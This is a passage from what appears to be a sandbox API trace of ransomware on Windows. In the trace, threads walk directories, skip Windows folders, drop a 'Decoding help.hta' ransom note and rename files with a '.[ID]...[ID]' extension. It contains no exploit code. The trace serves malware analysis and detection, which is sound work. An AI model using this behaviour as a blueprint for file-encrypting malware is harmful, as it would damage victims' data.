lpFindFileData=0x1b19fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x23721270, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x71680, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VCREDI~1._ID")) returned 0 [0045.070] FindClose (in: hFindFile=0x5e2b30 | out: hFindFile=0x5e2b30) returned 1 Thread: id = 419 os_tid = 0xa64 [0043.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*", lpFindFileData=0x1b2dfd30 | out: lpFindFileData=0x1b2dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2b30 [0045.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.093] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b2dfd30 | out: lpFindFileData=0x1b2dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.093] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.093] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b2dfd30 | out: lpFindFileData=0x1b2dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFax", cAlternateFileName="")) returned 1 [0045.094] lstrcmpW (lpString1=".", lpString2="MSFax") returned -1 [0045.094] lstrcmpW (lpString1="..", lpString2="MSFax") returned -1 [0045.094] lstrcmpiW (lpString1="windows", lpString2="MSFax") returned 1 [0045.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*" [0045.094] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned 47 [0045.094] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\", lpString2="MSFax" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" [0045.094] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" [0045.094] GlobalMemoryStatus (in: lpBuffer=0x1b2dfd10 | out: lpBuffer=0x1b2dfd10) [0045.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1134c370, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x238 [0045.105] CloseHandle (hObject=0x238) returned 1 [0045.105] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b2dfd30 | out: lpFindFileData=0x1b2dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSScan", cAlternateFileName="")) returned 1 [0045.105] lstrcmpW (lpString1=".", lpString2="MSScan") returned -1 [0045.105] lstrcmpW (lpString1="..", lpString2="MSScan") returned -1 [0045.105] lstrcmpiW (lpString1="windows", lpString2="MSScan") returned 1 [0045.105] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*" [0045.105] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned 47 [0045.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\", lpString2="MSScan" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" [0045.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*" [0045.106] GlobalMemoryStatus (in: lpBuffer=0x1b2dfd10 | out: lpBuffer=0x1b2dfd10) [0045.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cd84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x238 [0045.124] CloseHandle (hObject=0x238) returned 1 [0045.124] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1b2dfd30 | out: lpFindFileData=0x1b2dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSScan", cAlternateFileName="")) returned 0 [0045.124] FindClose (in: hFindFile=0x5e2b30 | out: hFindFile=0x5e2b30) returned 1 Thread: id = 420 os_tid = 0xb90 [0043.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*", lpFindFileData=0x1b41fd30 | out: lpFindFileData=0x1b41fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x2306f490, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2306f490, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2b70 [0045.103] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.103] FindNextFileW (in: hFindFile=0x5e2b70, lpFindFileData=0x1b41fd30 | out: lpFindFileData=0x1b41fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x2306f490, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2306f490, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.103] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.103] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.103] FindNextFileW (in: hFindFile=0x5e2b70, lpFindFileData=0x1b41fd30 | out: lpFindFileData=0x1b41fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x22ffd070, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x22ffd070, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x230231d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0045.103] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0045.103] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned 79 [0045.103] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" [0045.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\decoding help.hta")) returned 0x1 [0045.104] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0045.104] FindNextFileW (in: hFindFile=0x5e2b70, lpFindFileData=0x1b41fd30 | out: lpFindFileData=0x1b41fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xf93efac0, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x2306f490, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x8fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="STATER~1._ID")) returned 1 [0045.104] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0045.104] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned 79 [0045.104] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" [0045.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\decoding help.hta")) returned 0x1 [0045.104] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0045.104] lstrlenW (lpString="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned 34 [0045.104] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0045.104] FindNextFileW (in: hFindFile=0x5e2b70, lpFindFileData=0x1b41fd30 | out: lpFindFileData=0x1b41fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x23a1adf0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0xbf430, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VC_RED~1._ID")) returned 1 [0045.104] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0045.104] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned 79 [0045.104] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" [0045.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\decoding help.hta")) returned 0x1 [0045.104] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0045.104] lstrlenW (lpString="VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned 42 [0045.104] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0045.104] FindNextFileW (in: hFindFile=0x5e2b70, lpFindFileData=0x1b41fd30 | out: lpFindFileData=0x1b41fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x23a1adf0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0xbf430, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VC_RED~1._ID")) returned 0 [0045.104] FindClose (in: hFindFile=0x5e2b70 | out: hFindFile=0x5e2b70) returned 1 Thread: id = 421 os_tid = 0xb94 [0043.888] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*", lpFindFileData=0x1b55fd30 | out: lpFindFileData=0x1b55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bb0 [0045.120] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.120] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1b55fd30 | out: lpFindFileData=0x1b55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.120] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.120] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.120] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1b55fd30 | out: lpFindFileData=0x1b55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0045.120] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0045.120] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0045.120] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0045.123] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*" [0045.123] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*") returned 90 [0045.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0045.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*" [0045.123] GlobalMemoryStatus (in: lpBuffer=0x1b55fd10 | out: lpBuffer=0x1b55fd10) [0045.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24538320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a0 [0045.134] CloseHandle (hObject=0x4a0) returned 1 [0045.134] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1b55fd30 | out: lpFindFileData=0x1b55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0045.134] FindClose (in: hFindFile=0x5e2bb0 | out: hFindFile=0x5e2bb0) returned 1 Thread: id = 422 os_tid = 0xb9c [0043.888] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*", lpFindFileData=0x1b69fd30 | out: lpFindFileData=0x1b69fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bf0 [0045.132] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.132] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0x1b69fd30 | out: lpFindFileData=0x1b69fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.132] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.132] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.133] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0x1b69fd30 | out: lpFindFileData=0x1b69fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe506d6c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe506d6c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 1 [0045.133] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*" [0045.133] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*") returned 59 [0045.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\Decoding help.hta" [0045.133] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\decoding help.hta")) returned 0xffffffff [0045.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.133] WriteFile (in: hFile=0x308, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b69fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b69fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.418] CloseHandle (hObject=0x308) returned 1 [0045.418] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.490] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wordpad.exe.mui") returned -1 [0048.490] lstrlenW (lpString="wordpad.exe.mui") returned 15 [0048.490] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*" [0048.490] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*") returned 59 [0048.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\", lpString2="wordpad.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" [0048.490] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" [0048.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0048.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\wordpad.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\wordpad.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.490] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0x1b69fd30 | out: lpFindFileData=0x1b69fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe506d6c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe506d6c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 0 [0048.490] FindClose (in: hFindFile=0x5e2bf0 | out: hFindFile=0x5e2bf0) returned 1 Thread: id = 423 os_tid = 0xb88 [0043.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows 